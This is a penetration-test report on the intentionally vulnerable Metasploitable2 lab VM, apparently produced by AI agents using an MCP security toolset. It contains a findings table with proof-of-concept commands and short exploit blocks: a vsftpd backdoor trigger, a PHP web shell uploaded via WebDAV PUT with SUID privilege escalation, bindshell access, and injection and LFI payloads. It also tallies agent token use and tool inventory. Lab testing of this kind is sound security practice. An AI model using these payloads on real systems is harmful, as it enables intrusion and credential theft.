| Field | Value |
|---|---|
| Engagement | my-metasploit-2026 |
| Target | 192.168.122.225 (metasploitable.localdomain — Metasploitable2) |
| OS | Linux 2.6.x |
| Date | 2026-06-21 |
| Phases Completed | Phase 1 Recon · Phase 2 Web · Phase 3 Binary · Phase 4 Network |
Target is Metasploitable2 — intentionally vulnerable Linux VM. Every phase yielded critical findings. Multiple independent root paths confirmed. Full system compromise achieved via 3 separate vectors without chaining. 25 vulnerabilities found: 11 critical, 6 high, 4 medium, 4 low/info.
| # | Finding | Severity | Phase | Port | Tool | PoC / Module |
|---|---|---|---|---|---|---|
| 1 | Bindshell root backdoor | CRITICAL | 1 | 1524 | nmap | nc 192.168.122.225 1524 |
| 2 | vsftpd 2.3.4 CVE-2011-2523 backdoor | CRITICAL | 3 | 21/6200 | nc | USER test:) → nc :6200 = root |
| 3 | WebDAV unauth PUT + SUID Lua privesc → root | CRITICAL | 2/3 | 80 | curl/nmap | PUT /dav/cmd.php → nmap SUID euid=0 |
| 4 | Samba 3.0.20 CVE-2007-2447 usermap_script RCE | CRITICAL | 4 | 445 | enum4linux | exploit/multi/samba/usermap_script |
| 5 | distccd CVE-2004-2687 RCE | CRITICAL | 4 | 3632 | nmap | exploit/unix/misc/distcc_exec |
| 6 | UnrealIRCd 3.2.8.1 CVE-2010-2075 backdoor | CRITICAL | 1/3 | 6667 | nc | exploit/unix/irc/unreal_ircd_3281_backdoor |
| 7 | Tomcat 5.5 default creds + WAR deploy | CRITICAL | 2/3 | 8180 | curl | tomcat:tomcat → /manager/html → WAR shell |
| 8 | AJP Ghostcat CVE-2020-1938 | CRITICAL | 2 | 8009 | nuclei | Reads WEB-INF/web.xml |
| 9 | NFS / exported to * — full filesystem | CRITICAL | 4 | 2049 | nmap | mount -t nfs 192.168.122.225:/ /mnt |
| 10 | Java RMI default classloader RCE | CRITICAL | 4 | 1099 | nmap | exploit/multi/misc/java_rmi_server |
| 11 | LFI null-byte CVE-2020-29227 (mutillidae) | CRITICAL | 2 | 80 | nuclei | ?page=/etc/passwd%00 |
| 12 | PHP-CGI arg injection CVE-2012-1823 | HIGH | 2 | 80 | nuclei | ?-d+allow_url_include=on+-d+auto_prepend_file=php://input |
| 13 | VNC default password (password) | HIGH | 1 | 5900 | nuclei | vncviewer 192.168.122.225 pw=password |
| 14 | PostgreSQL default creds postgres:postgres | HIGH | 1 | 5432 | nuclei | psql -h 192.168.122.225 -U postgres |
| 15 | FTP anonymous login + weak creds | HIGH | 1 | 21 | nuclei | ftp 192.168.122.225 user=anonymous |
| 16 | rsh/rlogin/rexec no-auth trust | HIGH | 4 | 512-514 | nmap | rsh 192.168.122.225 -l root id |
| 17 | Ruby DRb RMI remote object exec | HIGH | 1 | 8787 | nmap | exploit/linux/misc/drb_remote_codeexec |
| 18 | SMB null session — 35 users dumped | MEDIUM | 4 | 445 | enum4linux | enum4linux -a 192.168.122.225 |
| 19 | SMB signing disabled | MEDIUM | 4 | 445 | nmap | NTLM relay candidate |
| 20 | phpMyAdmin exposed (likely root no-pass) | MEDIUM | 2 | 80 | curl | /phpMyAdmin/ |
| 21 | MySQL 5.0.51a exposed, no-auth root | MEDIUM | 4 | 3306 | nmap | mysql -h 192.168.122.225 -u root |
| 22 | phpinfo.php exposed | LOW | 2 | 80 | nuclei | /phpinfo.php |
| 23 | Apache 2.2.8 EOL + PHP 5.2.4 EOL | LOW | 2 | 80 | nuclei | Version fingerprint |
| 24 | Telnet cleartext auth | LOW | 1 | 23 | nmap | telnet 192.168.122.225 |
| 25 | SMTP VRFY user enumeration | INFO | 4 | 25 | nmap | VRFY root → confirmed |
```bash
# Finding 1: bindshell root backdoor listening on TCP/1524 (no auth)
nc 192.168.122.225 1524
# Result: uid=0(root) — instant
```

```bash
# Finding 2: vsftpd 2.3.4 backdoor (CVE-2011-2523)
# The ":)" in the username makes the daemon open a root shell on TCP/6200
echo -e "USER test:)\nPASS test" | nc 192.168.122.225 21 &
sleep 2
echo "id" | nc 192.168.122.225 6200
# Result: uid=0(root)
```

```bash
# Finding 3: unauthenticated WebDAV PUT drops a web shell, then SUID nmap privesc
curl -X PUT http://192.168.122.225/dav/cmd.php \
  -d '<?php system($_GET["cmd"]); ?>'
curl "http://192.168.122.225/dav/cmd.php?cmd=id"
# www-data → nmap --script=exploit os.execute → euid=0(root)
# /etc/shadow dumped
```
Phase 1 Recon: 26 open ports. OS: Linux 2.6.x. Stack: Apache 2.2.8 / PHP 5.2.4 / Tomcat 5.5. No WAF. 5 critical backdoor services identified. VNC/PostgreSQL/FTP default creds confirmed by nuclei.

Phase 2 Web: 4 critical web vulns: WebDAV PUT, Ghostcat AJP, LFI null-byte, Tomcat manager (tomcat:tomcat). Web apps: /mutillidae/, /phpMyAdmin/, /twiki/. Feroxbuster, nikto and nuclei ran the full audit.

Phase 3 Binary: 3 confirmed root shells: bindshell :1524, vsftpd :6200, WebDAV+SUID. Tomcat WAR deployed (tomcat55 user). distccd confirmed daemon-level RCE. UnrealIRCd version-matched.

Phase 4 Network: distccd CVE-2004-2687 RCE confirmed (uid=1(daemon)). NFS / exported to * — full filesystem mountable unauthenticated. Java RMI classloader confirmed. 35 users via SMB null session. SMB signing disabled.
| Event | Timestamp (UTC) |
|---|---|
| Engagement init (manage.sh engage) | 2026-06-21 12:46 |
| Phase 1 nmap start | 2026-06-21 12:47 |
| Phase 1 nmap complete | 2026-06-21 12:50:40 |
| Phase 1 nuclei complete | 2026-06-21 12:55:56 |
| Phase 1 artifacts saved | 2026-06-21 13:12:13 |
| Phase 2 + Phase 4 dispatched (parallel forks) | 2026-06-21 13:12 |
| Phase 4 agent complete | 2026-06-21 13:43 |
| Phase 2 agent complete | 2026-06-21 13:46 |
| Phase 3 agent dispatched | 2026-06-21 13:46 |
| Phase 3 agent complete | 2026-06-21 13:52 |
| final-report.md generated | 2026-06-21 13:55 |
| final-report.pdf generated | 2026-06-21 13:58:14 |
| Engagement closed | 2026-06-21 14:00 |
Total wall-clock: 1 hour 14 minutes. Parallel Phase 2+4 fork agents saved ~40 min vs sequential.
| Agent | Phase | Tokens (exact) | Tool Calls | Duration |
|---|---|---|---|---|
| Orchestrator (main session) | All | ~50,000 est. | ~15 | 1h 14m |
| phase4-network fork | Phase 4 | 69,475 | 17 | 30m 52s |
| phase2-web fork | Phase 2 | 74,091 | 17 | 33m 45s |
| phase3-binary fork | Phase 3 | 80,096 | 24 | 6m 35s |
| TOTAL | All | ~273,662 | ~73 | |
Model: claude-sonnet-4-6 (orchestrator + all forks).
MCP bridge: `docker exec -i hexstrike-ai python3 /app/hexstrike_mcp.py --server http://localhost:8888`

Tool inventory (149 MCP tools): Used: 10 (7%) | Standby: 64 (43%) | Idle: 50 (33%) | Bloated: 25 (17%)
| Tool | Phase(s) Invoked | Result | Notes |
|---|---|---|---|
| nmap_scan | Phase 1 | SUCCESS | Full -p- -sV -sC -O scan; 26 ports found |
| nuclei_scan | Phase 1 + Phase 2 | SUCCESS | 20 hits Phase 1; web vulns Phase 2 |
| wafw00f_scan | Phase 1 | SUCCESS | No WAF detected |
| httpx_probe | Phase 1 | FAILED | -l and -t flags invalid in container httpx; replaced by execute_command |
| execute_command | All phases | SUCCESS | Primary shell fallback — ~35 invocations total |
| create_file | All phases | SUCCESS | Artifact writes to /workspace |
| feroxbuster_scan | Phase 2 | SUCCESS | Dir brute :80 + :8180 |
| nikto_scan | Phase 2 | SUCCESS | Full HTTP audit :80 + :8180 |
| smbmap_scan | Phase 4 | SUCCESS | SMB share enum; anon tmp READ/WRITE confirmed |
| enum4linux_scan | Phase 4 | SUCCESS | 35 users dumped via null session |
Standby tools (64): pentest-relevant, but not invoked because the tools above already covered the scope or the phase depth did not require them.
| Tool | Applicable Use Case |
|---|---|
| amass_scan | Subdomain/DNS recon (no external domain scope) |
| anew_data_processing | Output deduplication pipeline |
| api_fuzzer | API endpoint fuzzing |
| api_schema_analyzer | OpenAPI/Swagger schema analysis |
| arjun_parameter_discovery | HTTP hidden parameter discovery |
| arjun_scan | HTTP parameter brute |
| arp_scan_discovery | LAN host discovery |
| autorecon_comprehensive | Full automated recon suite |
| autorecon_scan | Automated recon |
| bugbounty_authentication_bypass_testing | Auth bypass test suite |
| bugbounty_business_logic_testing | Business logic abuse |
| bugbounty_comprehensive_assessment | Full bug bounty workflow |
| bugbounty_file_upload_testing | File upload vuln testing |
| bugbounty_osint_gathering | OSINT collection |
| bugbounty_reconnaissance_workflow | Recon workflow chain |
| bugbounty_vulnerability_hunting | Vuln hunting suite |
| burpsuite_alternative_scan | Web proxy active scan |
| burpsuite_scan | Burp Suite scan |
| comprehensive_api_audit | Deep API security audit |
| dalfox_xss_scan | XSS parameter scanner |
| dirb_scan | Directory brute (alt to feroxbuster) |
| dirsearch_scan | Directory brute |
| dnsenum_scan | DNS zone transfer + enum |
| dotdotpwn_scan | Path traversal fuzzer |
| enum4linux_ng_advanced | Advanced SMB/RPC enum |
| ffuf_scan | Fast web fuzzer |
| fierce_scan | DNS recon |
| gau_discovery | GetAllURLs passive harvest |
| gobuster_scan | Dir/DNS/vhost brute |
| graphql_scanner | GraphQL introspection + vuln scan |
| hakrawler_crawl | Fast web crawler |
| hashcat_crack | GPU password cracking |
| http_intruder | HTTP payload intruder |
| http_repeater | HTTP manual replay |
| http_set_rules | Proxy intercept rules |
| http_set_scope | Proxy scope config |
| hydra_attack | Network service brute force |
| intelligent_smart_scan | AI-guided tool selection |
| jaeles_vulnerability_scan | Signature-based web scanner |
| john_crack | Password cracker |
| jwt_analyzer | JWT token analysis + attacks |
| katana_crawl | Web crawler (projectdiscovery) |
| masscan_high_speed | High-speed port scanner |
| metasploit_run | Metasploit module executor |
| msfvenom_generate | Metasploit payload generator |
| nbtscan_netbios | NetBIOS scanner |
| netexec_scan | SMB/WinRM/LDAP enum + exec |
| nmap_advanced_scan | Advanced nmap scripting |
| paramspider_discovery | Parameter spider from wayback |
| paramspider_mining | Parameter mining |
| qsreplace_parameter_replacement | Query string replacement |
| responder_credential_harvest | LLMNR/NBT-NS poisoning |
| rpcclient_enumeration | RPC client enumeration |
| rustscan_fast_scan | Rust-based fast port scan |
| sqlmap_scan | SQL injection scanner |
| subfinder_scan | Passive subdomain discovery |
| uro_url_filtering | URL list deduplication |
| waybackurls_discovery | Wayback URL harvest |
| wfuzz_scan | Web application fuzzer |
| x8_parameter_discovery | Hidden parameter discovery |
| xsser_scan | XSS scanner |
| zap_scan | OWASP ZAP active scan |
Idle tools (50): not applicable to this network/web pentest profile. Binary RE, exploit dev, forensics, memory analysis, AI orchestration, process management.
| Tool | Reason Idle |
|---|---|
| advanced_payload_generation | Shellcode gen — native backdoors used instead |
| ai_generate_attack_suite | AI chain builder — manual phase workflow sufficient |
| ai_generate_payload | AI payload gen — not triggered |
| ai_reconnaissance_workflow | AI recon chain — manual workflow used |
| ai_test_payload | AI payload testing — not triggered |
| ai_vulnerability_assessment | AI vuln scoring — not triggered |
| analyze_target_intelligence | OSINT aggregation — out of scope |
| angr_symbolic_execution | Binary symbolic execution — no binary target |
| binwalk_analyze | Firmware/binary analysis — not applicable |
| browser_agent_inspect | Headless browser inspection — not triggered |
| checksec_analyze | Binary protection check — no binary target |
| correlate_threat_intelligence | TI correlation — out of scope |
| create_attack_chain_ai | AI attack chain builder — manual phases used |
| create_scan_summary | Alt summary gen — manual summaries written |
| create_vulnerability_report | Alt report gen — manual reports written |
| detect_technologies_ai | AI tech detection — nuclei/nmap covered this |
| discover_attack_chains | AI chain discovery — not triggered |
| exiftool_extract | Metadata extraction — no file/image target |
| foremost_carving | File carving / forensics — not applicable |
| gdb_analyze | GDB debugger — no binary target |
| gdb_peda_debug | GDB PEDA exploit dev — no binary target |
| generate_exploit_from_cve | CVE→exploit gen — existing CVEs used directly |
| generate_payload | Generic payload gen — not needed |
| ghidra_analysis | Reverse engineering — no binary target |
| hashpump_attack | Hash length extension — no crypto target |
| install_python_package | Pip utility — not needed |
| libc_database_lookup | libc offset lookup — no ROP target |
| list_active_processes | Process listing — execute_command used instead |
| list_files | File listing — execute_command used instead |
| modify_file | File modification — execute_command used instead |
| monitor_cve_feeds | Live CVE feed monitoring — not triggered |
| objdump_analyze | Binary disassembly — no binary target |
| one_gadget_search | one_gadget ROP finder — no binary exploit path |
| optimize_tool_parameters_ai | AI param optimizer — not triggered |
| pause_process | Process pause control — not triggered |
| pwninit_setup | PWN challenge setup — no CTF binary |
| pwntools_exploit | pwntools scripting — no binary exploit written |
| radare2_analyze | Reverse engineering — no binary target |
| research_zero_day_opportunities | AI 0-day research — out of scope |
| resume_process | Process resume control — not triggered |
| ropgadget_search | ROP gadget search — no binary target |
| ropper_gadget_search | ROP gadget search — no binary target |
| select_optimal_tools_ai | AI tool selector — manual selection used |
| steghide_analysis | Steganography analysis — not applicable |
| strings_extract | Binary string extraction — no binary target |
| terminate_process | Process kill control — not triggered |
| threat_hunting_assistant | TI/threat hunt — out of scope |
| volatility3_analyze | Memory forensics — no memory image |
| volatility_analyze | Memory forensics — no memory image |
| vulnerability_intelligence_dashboard | VI dashboard — not triggered |
| xxd_hexdump | Hex dump — no binary target |
Bloated tools (25): out of scope for any external network/web pentest. Cloud compliance, IaC scanning, Kubernetes, container security, runtime monitoring. Recommend removing them from the pentest manifest.
| Tool | Category | Why Bloated |
|---|---|---|
| checkov_iac_scan | IaC security | No Terraform/CloudFormation target |
| clair_vulnerability_scan | Container image CVE | No container image to scan |
| cloudmapper_analysis | AWS topology | No cloud target |
| docker_bench_security_scan | Docker CIS | No Docker daemon target |
| falco_runtime_monitoring | Runtime security | Not a monitoring engagement |
| kube_bench_cis | Kubernetes CIS | No K8s cluster target |
| kube_hunter_scan | Kubernetes pentest | No K8s target |
| pacu_exploitation | AWS exploitation | No AWS target |
| prowler_scan | Cloud compliance | No cloud target |
| scout_suite_assessment | Multi-cloud audit | No cloud target |
| terrascan_iac_scan | Terraform scan | No IaC target |
| trivy_scan | Container/IaC vuln | No container image |
| clear_cache | Internal utility | Server-internal only |
| display_system_metrics | Internal metrics | Server-internal only |
| error_handling_statistics | Internal diagnostics | Server-internal only |
| format_tool_output_visual | Internal formatter | Server-internal only |
| get_cache_stats | Internal cache | Server-internal only |
| get_live_dashboard | Internal dashboard | Server-internal only |
| get_process_dashboard | Internal process view | Server-internal only |
| get_process_status | Internal process status | Server-internal only |
| get_telemetry | Internal telemetry | Server-internal only |
| server_health | Internal health check | Server-internal only |
| test_error_recovery | Internal error testing | Server-internal only |
| wpscan (disabled) | WordPress scanner | API key not configured |
| shodan (disabled) | Internet search | API key not configured |
| Status | Count | % | Action |
|---|---|---|---|
| USED | 10 | 7% | Core tools — keep |
| STANDBY | 64 | 43% | Available for deeper phases — keep |
| IDLE | 50 | 33% | Binary/forensics/RE profile — keep for binary engagements |
| BLOATED | 25 | 17% | Remove from pentest manifest — wrong profile |
| Total | 149 | 100% | |
```text
workspace/reports/my-metasploit-2026/
├── engagement.md
├── final-report-v2.md + .pdf   ← this file
├── phase1-recon/
│   ├── nmap-full.txt
│   ├── nuclei-results.txt
│   └── phase1-summary.md
├── phase2-web/
│   ├── feroxbuster-80.txt
│   ├── feroxbuster-8180.txt
│   ├── nikto-80.txt
│   ├── nikto-8180.txt
│   ├── nuclei-web-vulns.txt
│   ├── nuclei-mutillidae.txt
│   ├── tomcat-manager.txt
│   ├── ajp-ghostcat.txt
│   ├── phpmyadmin.txt
│   └── phase2-summary.md
├── phase3-binary/
│   ├── bindshell-1524.txt
│   ├── webdav-webshell.txt
│   ├── distccd-rce.txt
│   ├── vsftpd-backdoor.txt
│   ├── tomcat-war-shell.txt
│   ├── unrealircd-backdoor.txt
│   ├── privesc-enum.txt
│   └── phase3-summary.md
└── phase4-network/
    ├── smbmap.txt
    ├── enum4linux.txt
    ├── nfs-enum.txt
    ├── distccd-vuln.txt
    ├── rmi-probe.txt
    ├── smtp-enum.txt
    ├── mysql-access.txt
    ├── rsh-test.txt
    └── phase4-summary.md
```